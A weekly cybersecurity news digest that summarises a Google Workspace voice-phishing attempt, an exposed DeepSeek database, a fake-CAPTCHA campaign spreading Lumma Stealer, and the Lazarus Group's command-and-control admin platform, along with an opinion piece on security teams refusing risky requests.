CyberBakery Chronicles

Your Weekly Cybersecurity Update (31 Jan 2025)

• Sophisticated Voice Phishing Scam Attempt Exploiting Google Workspace Domain Verification Flaw

• Cybersecurity Needs to Start Saying 'No' Again

• DeepSeek AI Database Exposed: Over 1 Million Log Lines, Secret Keys Leaked

• Fake CAPTCHA Campaign Spreads Malware

• Researchers Uncover Lazarus Group Admin Layer for C2 Servers

Sophisticated Voice Phishing Scam Attempt Exploiting Google Workspace Domain Verification Flaw

Google is fortifying its security measures following a recent elaborate voice phishing attack documented by programmer Zach Latta.

Latta, founder of Hack Club, detailed a close call he had with scammers who attempted to hijack his Google account through a series of tactics that bypassed traditional security measures.

The scammers, posing as Google Workspace support staff, contacted Latta, claiming to have detected a suspicious login attempt. They used a phone number associated with Google Assistant calls and a seemingly legitimate "Google" caller ID. Additionally, a password reset email was sent from a genuine Google Workspace address, making the scam highly convincing.

However, Latta remained cautious and ultimately identified inconsistencies in the scammers' story. Notably, one scammer contradicted another on details, and a request to call them back was met with an unfazed response, raising a red flag.

This incident exposes a critical vulnerability: the ability for attackers to create Google Workspace accounts using unverified g.co subdomains. This allows them to send password reset emails that appear to originate from Google itself.

Google has acknowledged the issue and is taking steps to bolster its defences against such scams. They have suspended the account used in this attempt and are working to prevent attackers from exploiting g.co subdomains during registration.

The Latta case is a stark reminder to be wary of unsolicited calls, even if they appear to come from legitimate sources. Users should never provide sensitive information over the phone and should be extra cautious about emails originating from unverified senders.

This incident also highlights the evolving nature of phishing tactics and the need for continuous vigilance and security improvements.

Cybersecurity Needs to Start Saying 'No' Again

For years, cybersecurity teams were often perceived as the "Department of No," constantly blocking initiatives due to security concerns. However, to demonstrate value and foster collaboration, many teams have shifted towards a more accommodating approach.

While this shift has its benefits, some experts argue that it may have gone too far, leading to security teams overlooking critical risks and compromising their ability to effectively protect the organization.

Avoiding necessary "NOs" can have detrimental consequences, including:

• Misalignment: Lack of clear boundaries can lead to confusion and misalignment between security teams and other departments.

• Overwhelmed Teams: Constant pressure to accommodate requests can overwhelm security teams and lead to burnout.

• Unmanaged Risks: Compromising security measures can increase the organisation's vulnerability to cyber threats.

However, saying "no" effectively is crucial. It requires careful consideration, clear communication, and a focus on aligning security decisions with broader business goals.

By emphasizing the importance of well-considered "nos" and fostering open communication and collaboration, security teams can better protect their organizations while maintaining positive relationships with other departments.

DeepSeek AI Database Exposed: Over 1 Million Log Lines, Secret Keys Leaked

DeepSeek, a rapidly emerging Chinese AI startup, inadvertently exposed a ClickHouse database to the internet, potentially allowing unauthorised access to sensitive information. The exposed data included over a million log entries containing chat histories, secret keys, backend details, API secrets, and operational metadata.

This vulnerability permitted full control over database operations without requiring authentication, enabling the execution of arbitrary SQL queries via a web browser. Upon notification, DeepSeek promptly secured the database. This incident underscores the critical importance of implementing robust security measures alongside the rapid deployment of AI services to protect customer data and prevent accidental exposures.

Bloomberg, Financial Times, and The Wall Street Journal have reported that OpenAI and Microsoft are actively investigating DeepSeek’s potential unauthorised use of OpenAI's application programming interface (API) to train its own models on the outputs generated by OpenAI's systems. This practice, known as distillation, raises significant concerns regarding intellectual property and compliance.

Fake CAPTCHA Campaign Spreads Malware

Cybersecurity researchers have identified a global malware campaign that uses fake CAPTCHA verification pages to distribute the Lumma information stealer. This campaign targets multiple industries, including healthcare, banking, marketing, and telecommunications, with notable activity in countries such as Argentina, Colombia, the United States, and the Philippines.

The attack begins when a user visits a compromised website and is redirected to a fraudulent CAPTCHA page. This page instructs the user to copy and paste a command into the Windows Run prompt, utilizing the legitimate mshta.exe utility to download and execute a malicious HTA file from a remote server. This method bypasses browser-based security measures by prompting the user to perform actions outside the browser environment.

The HTA file executes a PowerShell command that downloads additional scripts, ultimately leading to the deployment of the Lumma Stealer malware. Notably, the malware employs techniques to evade detection, such as bypassing the Windows Antimalware Scan Interface (AMSI).

Lumma Stealer operates under a malware-as-a-service (MaaS) model and has been increasingly active in recent months. Attackers have diversified their delivery methods, including the use of approximately 1,000 counterfeit domains impersonating platforms like Reddit and WeTransfer. These domains redirect users to download password-protected archives containing an AutoIT-based dropper, which then executes the Lumma Stealer.

This campaign is another reminder that cybercriminals continue to refine their social engineering tactics. Fake CAPTCHA pages provide a stealthy way to deliver malware, making it crucial for users to stay vigilant and for organisations to strengthen their security posture with a combination of awareness training and advanced threat detection.

Researchers Uncover Lazarus Group Admin Layer for C2 Servers

Recent investigations have unveiled that North Korea's Lazarus Group employs a sophisticated web-based administrative platform to manage its command-and-control (C2) operations. This platform, built using React for the front end and Node.js for the back end, is consistently deployed across multiple C2 servers, enabling the group to centrally oversee compromised systems, control payload distribution, and efficiently handle exfiltrated data.

The Lazarus Group has been linked to a supply chain attack campaign known as Operation Phantom Circuit, which targeted the cryptocurrency sector and developers worldwide. In this campaign, the group embedded obfuscated backdoors into legitimate software packages, deceiving developers into executing compromised applications. This approach allowed them to exfiltrate sensitive data and manage victims through their C2 servers.

To conceal their activities, the group employs an elaborate network of Virtual Private Networks (VPNs) and proxies. They route traffic through intermediaries, including Astrill VPN endpoints and Oculus Proxy nodes registered to Sky Freight Limited in Hasan, Russia, before reaching their C2 infrastructure. Despite these obfuscation techniques, researchers have traced the operations back to Pyongyang, North Korea, identifying six distinct North Korean IP addresses initiating connections.

The Lazarus Group's administrative platform features capabilities such as monitoring device details, collecting browser-stored credentials, and tracking victim interaction timestamps. This level of precision and customisation indicates a deliberate effort to manage stolen data at scale while evading detection.

This discovery underscores the advanced operational security practices of the Lazarus Group in conducting global cyber operations, highlighting their ability to adapt and evolve their tactics to maintain persistent access and evade detection.